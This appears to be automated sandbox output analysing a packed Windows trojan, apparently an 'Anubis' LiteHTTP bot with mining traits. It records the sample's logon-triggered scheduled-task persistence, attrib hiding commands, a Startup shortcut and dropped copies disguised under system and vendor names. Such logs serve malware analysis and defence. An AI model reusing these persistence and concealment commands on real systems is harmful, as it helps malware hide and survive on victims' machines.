                    Source: windows mail.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: windows mail.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: windows media player.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: windows media player.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: classification engineClassification label: mal100.troj.evad.mine.winEXE@53/47@0/1
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DQmU06kq9I.lnkJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1600:120:WilError_03
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5412:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5808:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1620:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2384:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6492:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5280:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2928:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5228:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6488:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7120:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1052:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5032:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3352:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5052:120:WilError_03
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: DQmU06kq9I.exeReversingLabs: Detection: 60%
                    Source: DQmU06kq9I.exeVirustotal: Detection: 34%
                    Source: DQmU06kq9I.exeString found in binary or memory: 3The file %s is missing. Please, re-install this application
                    Source: DQmU06kq9I.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: DQmU06kq9I.exeString found in binary or memory: 3The file %s is missing. Please, re-install this application
                    Source: DQmU06kq9I.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: DQmU06kq9I.exeString found in binary or memory: 3The file %s is missing. Please, re-install this application
                    Source: DQmU06kq9I.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile read: C:\Users\user\Desktop\DQmU06kq9I.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\DQmU06kq9I.exe "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "DQmU06kq9I"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc onlogon /tn "DQmU06kq9I" /tr "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\Desktop\DQmU06kq9I.exe C:\Users\user\Desktop\DQmU06kq9I.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\DQmU06kq9I.exe "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "DQmU06kq9I"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "DQmU06kq9I"
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "DQmU06kq9I"Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc onlogon /tn "DQmU06kq9I" /tr "C:\Users\user\Desktop\DQmU06kq9I.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "DQmU06kq9I"Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "DQmU06kq9I"Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32Jump to behavior
                    Source: DQmU06kq9I.lnk.0.drLNK file: ..\..\..\..\..\..\..\Desktop\DQmU06kq9I.exe
                    Source: DQmU06kq9I.exeStatic file information: File size 1763328 > 1048576
                    Source: DQmU06kq9I.exeStatic PE information: Raw size of fsrfimey is bigger than: 0x100000 < 0x1a3c00
                    Source: Binary string: C:\Users\Badus\OneDrive\Desktop\Projects\Anubis-Master\Bot\Bot\LiteHTTP\obj\x86\Debug\Anubis.pdb source: DQmU06kq9I.exe, DQmU06kq9I.exe, 00000009.00000003.2782245640.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4552478393.0000000008BA2000.00000004.00001000.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4541221969.0000000000552000.00000040.00000001.01000000.00000003.sdmp

                    Data Obfuscation

                    barindex
                    Detected unpacking (changes PE section rights)
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeUnpacked PE file: 0.2.DQmU06kq9I.exe.550000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fsrfimey:EW;mhpawist:EW;.taggant:EW; vs :ER;.rsrc:W;
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeUnpacked PE file: 9.2.DQmU06kq9I.exe.550000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fsrfimey:EW;mhpawist:EW;.taggant:EW; vs :ER;.rsrc:W;
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                    Source: reference assemblies.exe.0.drStatic PE information: real checksum: 0x1bc7f7 should be: 0x1ba398
                    Source: windows defender.exe.0.drStatic PE information: real checksum: 0x1bc7f7 should be: 0x1ba398
                    Source: mavdwwsoqjljtvhgturlqfwslqtpryboqwmbsicodmvqkq.exe.0.drStatic PE information: real checksum: 0x1bc7f7 should be: 0x1ba398
                    Source: microsoft office.exe.0.drStatic PE information: real checksum: 0x1bc7f7 should be: 0x1ba398
                    Source: internet explorer.exe.0.drStatic PE information: real checksum: 0x1bc7f7 should be: 0x1ba398
                    Source: microsoft.exe.0.drStatic PE information: real checksum: 0x1bc7f7 should be: 0x1ba398
                    Source: google.exe.0.drStatic PE information: real checksum: 0x1bc7f7 should be: 0x1ba398
                    Source: msbuild.exe.0.drStatic PE information: real checksum: 0x1bc7f7 should be: 0x1ba398
                    Source: mozilla maintenance service.exe.0.drStatic PE information: real checksum: 0x1bc7f7 should be: 0x1ba398
                    Source: windows nt.exe.0.drStatic PE information: real checksum: 0x1bc7f7 should be: 0x1ba398
                    Source: windowspowershell.exe.0.drStatic PE information: real checksum: 0x1bc7f7 should be: 0x1ba398
                    Source: DQmU06kq9I.exeStatic PE information: real checksum: 0x1bc7f7 should be: 0x1ba398
                    Source: windows portable devices.exe.0.drStatic PE information: real checksum: 0x1bc7f7 should be: 0x1ba398
